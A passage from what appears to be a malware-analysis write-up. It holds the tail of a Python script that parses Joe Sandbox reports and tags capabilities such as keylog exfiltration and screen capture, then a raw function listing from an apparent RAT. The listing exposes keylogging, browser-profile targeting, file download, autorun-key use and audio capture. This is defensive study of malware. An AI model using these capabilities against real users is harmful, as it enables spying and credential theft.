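  • Part of subcall function 00418706: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B62,00000000,?,?), ref: 00418718
  • Part of subcall function 004186B4: GdipDisposeImage.GDIPLUS(?,00418BBD), ref: 004186BD
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• String ID: image/jpeg
• Instruction Fuzzy Hash: 6D316F72504310AFC701EF65C884D6FB7E9EF8A304F00496EF98597251DB7999048B66
"""

FIELD = re.compile(r"•\s*(Source File|String ID|Instruction Fuzzy Hash):\s*(.*)")
# Matches both "• send.WS2_32(" and "• _free.LIBCMT ref:", optionally prefixed by the subcall note.
API_CALL = re.compile(r"•\s*(?:Part of subcall function [0-9A-F]+:\s*)?(\w+)\.(\w+)(?:\(|\s+ref:)")


def parse_records(text):
    """Split report text into per-function dicts: apis, modules, strings, source, fuzzy.

    A record opens at an 'APIs' line and closes at its 'Instruction Fuzzy Hash' line;
    a dangling tail before the first 'APIs' (as at the top of this section) is skipped.
    """
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = {"apis": [], "modules": set(), "strings": "", "source": "", "fuzzy": ""}
            continue
        if cur is None:
            continue
        if (m := FIELD.match(line)):
            key, val = m.groups()
            if key == "Source File":
                cur["source"] = val.split(",")[0]   # drop ", Offset: ..., based on PE: ..."
            elif key == "String ID":
                cur["strings"] = val
            else:
                cur["fuzzy"] = val
                records.append(cur)                 # last field of a record
                cur = None
        elif (m := API_CALL.match(line)):
            cur["apis"].append(m.group(1))
            cur["modules"].add(m.group(2))
    return records


def screen_capture(r):
    """Image re-encoded into a memory stream (the record's string gives the MIME type)."""
    return {"SHCreateMemStream", "GdipSaveImageToStream"} <= set(r["apis"])


def keylog_exfil(r):
    """Keyboard-layout lookup in the same function as socket I/O: keylog data staged for C2."""
    return "GetKeyboardLayoutNameA" in r["apis"] and bool({"connect", "send"} & set(r["apis"]))


def crt_noise(r):
    """CRT invalid-parameter path: PF_FASTFAIL_AVAILABLE (0x17) probe, then TerminateProcess
    with STATUS_INVALID_CRUNTIME_PARAMETER (0xC0000417). Library code, not a capability."""
    return {"IsProcessorFeaturePresent", "TerminateProcess"} <= set(r["apis"])


RULES = {"screen_capture": screen_capture, "keylog_exfil": keylog_exfil, "crt_noise": crt_noise}


def summarize(text):
    """Map each memory-dump source to the sorted capability tags found in its functions."""
    tags = defaultdict(set)
    for r in parse_records(text):
        for name, rule in RULES.items():
            if rule(r):
                tags[r["source"]].add(name)
    return {src: sorted(t) for src, t in tags.items()}


if __name__ == "__main__":
    for src, caps in summarize(SAMPLE).items():
        print(src, "->", ", ".join(caps))
```

                                                                                                                                                                          Feeding the full function listing of a report into summarize() separates the dump that carries the RAT's own capabilities (here the 0x400000 image) from dumps that only contribute runtime library code, which is the first question to settle before spending time on individual fuzzy hashes.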
APIs
• SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418BE5
  • Part of subcall function 00418691: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418B0C,00000000,?,?,?,?,00000000), ref: 004186A5
• SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418C0A
  • Part of subcall function 00418706: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B62,00000000,?,?), ref: 00418718
  • Part of subcall function 004186B4: GdipDisposeImage.GDIPLUS(?,00418BBD), ref: 004186BD
Strings
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Stream$GdipImage$Create$DisposeFromLoadSave
• String ID: image/png
• API String ID: 1291196975-2966254431
• Opcode ID: 59aa457744364f091b6bcb9ce6af0e0968cb763baa3c3fa79ffc4f27b17189cc
• Instruction ID: f628a6b37c0337dbee8ef7f798de7cbb8cc54a1da061f00231e4b0513ad08027
• Opcode Fuzzy Hash: 59aa457744364f091b6bcb9ce6af0e0968cb763baa3c3fa79ffc4f27b17189cc
• Instruction Fuzzy Hash: 4221C375204211AFC700AB61CC89DBFBBACEFCA314F10452EF54693251DB389945CBA6
APIs
• GetLocalTime.KERNEL32(?,004755A8,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405030
  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
• GetLocalTime.KERNEL32(?,004755A8,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405087
Strings
• KeepAlive | Enabled | Timeout: , xrefs: 0040501F
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: LocalTime
• String ID: KeepAlive | Enabled | Timeout:
• API String ID: 481472006-1507639952
• Opcode ID: 8ec06cc165161d8c8adbfcb3abee473b515424f62eec08f026c25f94e2b42d60
• Instruction ID: b700b38ef9f928670de2390b904a97a1cb71e472754ad5b4355c5e73bb52b66b
• Opcode Fuzzy Hash: 8ec06cc165161d8c8adbfcb3abee473b515424f62eec08f026c25f94e2b42d60
• Instruction Fuzzy Hash: E62104719007806BD710B732A80A76F7B64E755308F44057EE8491B2A2EB7D5988CBDE
APIs
• Sleep.KERNEL32 ref: 0041667B
• URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166DD
Strings
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: DownloadFileSleep
• String ID: !D@
• API String ID: 1931167962-604454484
• Opcode ID: 8114e628eea57f2808d6efc14bab377c0a18422bda66f60f7fafba6988014c86
• Instruction ID: 943aba663a6785b3e55a0e29e9dd0f60b42d3502aaa7a5a348319576c1e2766f
• Opcode Fuzzy Hash: 8114e628eea57f2808d6efc14bab377c0a18422bda66f60f7fafba6988014c86
• Instruction Fuzzy Hash: 9D1142716083029AC614FF72D8969AE77A4AF50348F400C7FF546531E2EE3C9949C65A
APIs
Strings
Memory Dump Source
• Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
Similarity
• API ID: _strlen
• String ID: : $Se.
• API String ID: 4218353326-4089948878
• Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
• Instruction ID: 66f447a9efa091531784e06c0e565222335d100d85517175c1dac28435e0d9bb
• Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
• Instruction Fuzzy Hash: 2F11E7B5904249AEDB11DFA8D841BDEFBFCEF09244F104056E545E7252E6706B02C765
APIs
• GetLocalTime.KERNEL32(00000000), ref: 0041B59A
Strings
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: LocalTime
• String ID: | $%02i:%02i:%02i:%03i
• API String ID: 481472006-2430845779
• Opcode ID: 4366d4699f73263778e54812fb50b651df52e241bed65e6deada5bde40811a9a
• Instruction ID: dc1ef91952a31d7701eba46fb19b130c3a81cf04c31882e55cbcd77cf5b9c3d8
• Opcode Fuzzy Hash: 4366d4699f73263778e54812fb50b651df52e241bed65e6deada5bde40811a9a
• Instruction Fuzzy Hash: 72118E714082455AC304EB62D8519BFB3E9AB44308F50093FF88AA21E1EF3CDA45C69E
APIs
• PathFileExistsW.SHLWAPI(00000000), ref: 0041ADCD
Strings
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: ExistsFilePath
• String ID: alarm.wav$xYG
• API String ID: 1174141254-3120134784
• Opcode ID: 821df8ad2e412678609072b1e179d49ef4e6f5bd5d6652d785030614b6c5786a
• Instruction ID: fba4c3df788ebc26406fa6248c5b94d62a9d66ba9cb3dc57f05af0bb44f50ff0
• Opcode Fuzzy Hash: 821df8ad2e412678609072b1e179d49ef4e6f5bd5d6652d785030614b6c5786a
• Instruction Fuzzy Hash: 78019E7068831166CA04F77688166EE37559B80318F00847FF64A566E2EFBC9A9586CF
APIs
  • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
  • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
• CloseHandle.KERNEL32(?), ref: 0040B0EF
• UnhookWindowsHookEx.USER32 ref: 0040B102
Strings
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
• String ID: Online Keylogger Stopped
• API String ID: 1623830855-1496645233
• Opcode ID: 58fc78273637d3a7085363245c614971f3a5c921d027ed369f39b2d39b95462a
• Instruction ID: 2c7fc3a8f12b1f8c565497f75251163d8124a4eac963031352a4caf2a1bdec21
• Opcode Fuzzy Hash: 58fc78273637d3a7085363245c614971f3a5c921d027ed369f39b2d39b95462a
• Instruction Fuzzy Hash: 6F01F530600610ABD7217B35C81B7BE7B729B41304F4004BFE982265C2EBB91856C7DE
APIs
• __CxxThrowException@8.LIBVCRUNTIME ref: 10002903
  • Part of subcall function 100035D2: RaiseException.KERNEL32(?,?,?,10002925,00000000,00000000,00000000,?,?,?,?,?,10002925,?,100121B8), ref: 10003632
• __CxxThrowException@8.LIBVCRUNTIME ref: 10002920
Strings
Memory Dump Source
• Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
Similarity
• API ID: Exception@8Throw$ExceptionRaise
• String ID: Unknown exception
• API String ID: 3476068407-410509341
• Opcode ID: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
• Instruction ID: 696891806b75a506f07e96a947ab79166ff1ea0d2f17bc9dac180a151cc952bd
• Opcode Fuzzy Hash: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
• Instruction Fuzzy Hash: 2BF0A47890420D77AB04E6E5EC4599D77ACDB006D0F508161FD1496499EF31FA658690
APIs
• waveInPrepareHeader.WINMM(00758E18,00000020,?), ref: 00401849
• waveInAddBuffer.WINMM(00758E18,00000020), ref: 0040185F
Strings
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: wave$BufferHeaderPrepare
• String ID: hMG
• API String ID: 2315374483-350922481
• Opcode ID: 05842d2320f940dcc6a072c2e7d52a08573503918b4c9d372d2077cc61f75943
• Instruction ID: 961ac9ec07701b1a047984959549e732b5ed52ade8bfae490fcb5a94ac50a39c
• Opcode Fuzzy Hash: 05842d2320f940dcc6a072c2e7d52a08573503918b4c9d372d2077cc61f75943
• Instruction Fuzzy Hash: 46016D71701301AFC7609F75EC449697BA9FF89355701413AF409C77A2EB759C50CB98
APIs
• IsValidLocale.KERNEL32(00000000,kKD,00000000,00000001,?,?,00444B6B,?,?,?,?,00000004), ref: 00448BB2
Strings
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: LocaleValid
• String ID: IsValidLocaleName$kKD
• API String ID: 1901932003-3269126172
• Opcode ID: 411afafda0bfc4592f61c6642b3d3a7ff2b19ca3a749cc907bc85bd1ec8c8ae6
• Instruction ID: c774fcfd7954269485cc3e12fd2bed3330e0a6a7af379781e67d062e13931268
• Opcode Fuzzy Hash: 411afafda0bfc4592f61c6642b3d3a7ff2b19ca3a749cc907bc85bd1ec8c8ae6
• Instruction Fuzzy Hash: 9BF05230A80708FBDB016B60DC06FAE7B54CB44B12F10007EFD046B291DE799E0091ED
APIs
• PathFileExistsW.SHLWAPI(00000000), ref: 0040C531
Strings
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: ExistsFilePath
• String ID: UserProfile$\AppData\Local\Google\Chrome\
• API String ID: 1174141254-4188645398
• Opcode ID: 2b6c0150b8fccbbffc8f0b3b989992b7109110bbcbfb9973898c57e16d168baa
• Instruction ID: 9b0ec594f197676e752fca63164bf20e3c748e9c9f1ad615e42e10c79405690b
• Opcode Fuzzy Hash: 2b6c0150b8fccbbffc8f0b3b989992b7109110bbcbfb9973898c57e16d168baa
• Instruction Fuzzy Hash: FEF05E30A00219A6CA04BBB69C478AF7B289910759B40017FBA01B21D3EE78994586DD
APIs
• PathFileExistsW.SHLWAPI(00000000), ref: 0040C594
Strings
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: ExistsFilePath
• String ID: UserProfile$\AppData\Local\Microsoft\Edge\
• API String ID: 1174141254-2800177040
• Opcode ID: be2ac72381ba667652cb8157c7eab32d159168f8a730a51bc7883fbde0610272
• Instruction ID: ebfb9b6c20c42028ef61fa2b9513503d2b9bf0243ac81fc6585c9643e3935da3
• Opcode Fuzzy Hash: be2ac72381ba667652cb8157c7eab32d159168f8a730a51bc7883fbde0610272
• Instruction Fuzzy Hash: F1F05E70A0021AE6CA04BBB69C478EF7B2C9910755B40017BBA01721D3FE7CA94586ED
APIs
• PathFileExistsW.SHLWAPI(00000000), ref: 0040C5F7
Strings
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: ExistsFilePath
• String ID: AppData$\Opera Software\Opera Stable\
• API String ID: 1174141254-1629609700
• Opcode ID: e9aef06425b09f93b4b18eec61b32618902fb8755f3519ca0ccc41cb67e29c85
• Instruction ID: 695210f55460e2722832162fecb8267ed9c5d90cd61684e29202a639a57ef244
• Opcode Fuzzy Hash: e9aef06425b09f93b4b18eec61b32618902fb8755f3519ca0ccc41cb67e29c85
• Instruction Fuzzy Hash: 38F05E30A00219D6CA14BBB69C478EF7B2C9950755F1005BBBA01B21D3EE789941C6ED
APIs
Strings
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: _free
• String ID: vv
• API String ID: 269201875-118461835
• Opcode ID: c3cbfa58486471b9b0b5450975d814376b4bfcef5d9edc52bbd6be3dc13577df
• Instruction ID: 5d396c1abc39b18bdc3e623667384c8b5cce6391ee106473ff554fc58991571d
• Opcode Fuzzy Hash: c3cbfa58486471b9b0b5450975d814376b4bfcef5d9edc52bbd6be3dc13577df
• Instruction Fuzzy Hash: 7CE0E532A0652041F675763B2D05A5B47C55FC2B3AF22033BF028861C1DFEC494A606E
APIs
• GetKeyState.USER32(00000011), ref: 0040B686
  • Part of subcall function 0040A41B: GetForegroundWindow.USER32 ref: 0040A451
  • Part of subcall function 0040A41B: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
  • Part of subcall function 0040A41B: GetKeyboardLayout.USER32 ref: 0040A464
  • Part of subcall function 0040A41B: GetKeyState.USER32(00000010), ref: 0040A46E
  • Part of subcall function 0040A41B: GetKeyboardState.USER32(?), ref: 0040A479
  • Part of subcall function 0040A41B: ToUnicodeEx.USER32 ref: 0040A49C
  • Part of subcall function 0040A41B: ToUnicodeEx.USER32 ref: 0040A4FC
  • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
Strings
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
• String ID: [AltL]$[AltR]
• API String ID: 2738857842-2658077756
• Opcode ID: 2bdc01cacd876c0b350abb7d408e8864ecff36be759564c8f89a1257273347cd
• Instruction ID: d407634c764e35d79823ffb94670adf82ecea3c262ef0a09b09082b5b6a355d5
• Opcode Fuzzy Hash: 2bdc01cacd876c0b350abb7d408e8864ecff36be759564c8f89a1257273347cd
• Instruction Fuzzy Hash: B2E0652171032052C859363D592FABE2D11CB41B64B42097FF842AB7D6DABF4D5543CF
                                                                                                                                                                          APIs
                                                                                                                                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161E3
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExecuteShell
                                                                                                                                                                          • String ID: !D@$open
                                                                                                                                                                          • API String ID: 587946157-1586967515
                                                                                                                                                                          • Opcode ID: 4c61eaa6548ee28cdb1e2a4907ffc3a5f6acbad4bc53697dcaba2df13cd2f041
                                                                                                                                                                          • Instruction ID: 3b2857edeaddefe186f4a0a52e989bb70d7a4cfa1db765b6d796ce97600c5b03
                                                                                                                                                                          • Opcode Fuzzy Hash: 4c61eaa6548ee28cdb1e2a4907ffc3a5f6acbad4bc53697dcaba2df13cd2f041
                                                                                                                                                                          • Instruction Fuzzy Hash: 4AE012712483059AD214EA72DC92EFEB35CAB54755F404C3FF506524E2EF3C5C49C66A
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetKeyState.USER32(00000012), ref: 0040B6E0
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: State
                                                                                                                                                                          • String ID: [CtrlL]$[CtrlR]
                                                                                                                                                                          • API String ID: 1649606143-2446555240
                                                                                                                                                                          • Opcode ID: 5e9c90a2b5f30f0669b27174b58f532bfe2dc3a0439e10c0f003492ce4cfd8eb
                                                                                                                                                                          • Instruction ID: b338140f060b4cc34328e336f8905ed3f99262ec5dadafe534bff25dd27afc5e
                                                                                                                                                                          • Opcode Fuzzy Hash: 5e9c90a2b5f30f0669b27174b58f532bfe2dc3a0439e10c0f003492ce4cfd8eb
                                                                                                                                                                          • Instruction Fuzzy Hash: CFE04F2160072052C5243A7D561A67A2911C7C2764F41057BE9826B7C6DABE891452DF
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 00410F64
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Init_thread_footer__onexit
                                                                                                                                                                          • String ID: <kG$@kG
                                                                                                                                                                          • API String ID: 1881088180-1261746286
                                                                                                                                                                          • Opcode ID: 225a41fd0d315e7b14745aeefdffd8a249a85d76d0a8159229783941359da412
                                                                                                                                                                          • Instruction ID: b3c290aa7aaf28965b2d5d57398085964b0ab7c4475a0d5935719b6e6c356165
                                                                                                                                                                          • Opcode Fuzzy Hash: 225a41fd0d315e7b14745aeefdffd8a249a85d76d0a8159229783941359da412
                                                                                                                                                                          • Instruction Fuzzy Hash: 4BE0D8315049208AC510B75EE442AC53345DB0A324B21907BF414D72D2CBAE78C24E5D
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A6A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DeleteOpenValue
                                                                                                                                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                                                                                                                          • API String ID: 2654517830-1051519024
                                                                                                                                                                          • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                                                                                                                                          • Instruction ID: 8a242acd51d06e7ce72e997358fe7bb9804e2c240f13b939b69747d851efcbee
                                                                                                                                                                          • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                                                                                                                                          • Instruction Fuzzy Hash: FFE0C231244208FBEF104FB1DD06FFA7B2CDB01F42F1006A9BA0692192C626CE049664
                                                                                                                                                                          APIs
                                                                                                                                                                          • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8B1
                                                                                                                                                                          • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8DC
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DeleteDirectoryFileRemove
                                                                                                                                                                          • String ID: pth_unenc
                                                                                                                                                                          • API String ID: 3325800564-4028850238
                                                                                                                                                                          • Opcode ID: abbea0d7173f6b15884b0e8937d7cb34f61697f5a4d448918d1cd9e56a781f81
                                                                                                                                                                          • Instruction ID: ee660421d7ec44f6c6eaad5e9e1fc6482a22fb53094cf60c5c3e5a772ac54322
                                                                                                                                                                          • Opcode Fuzzy Hash: abbea0d7173f6b15884b0e8937d7cb34f61697f5a4d448918d1cd9e56a781f81
                                                                                                                                                                          • Instruction Fuzzy Hash: 5AE04F314006109BC610BB218854AD6335CAB04316F00497BE4A3A35A1DF38AC49D658
                                                                                                                                                                          APIs
                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                                                                                                                          • WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ObjectProcessSingleTerminateWait
                                                                                                                                                                          • String ID: pth_unenc
                                                                                                                                                                          • API String ID: 1872346434-4028850238
                                                                                                                                                                          • Opcode ID: d98377acd33bdda2349b7be151d0e491c89c80a6de05baeaae50e9a3ec635156
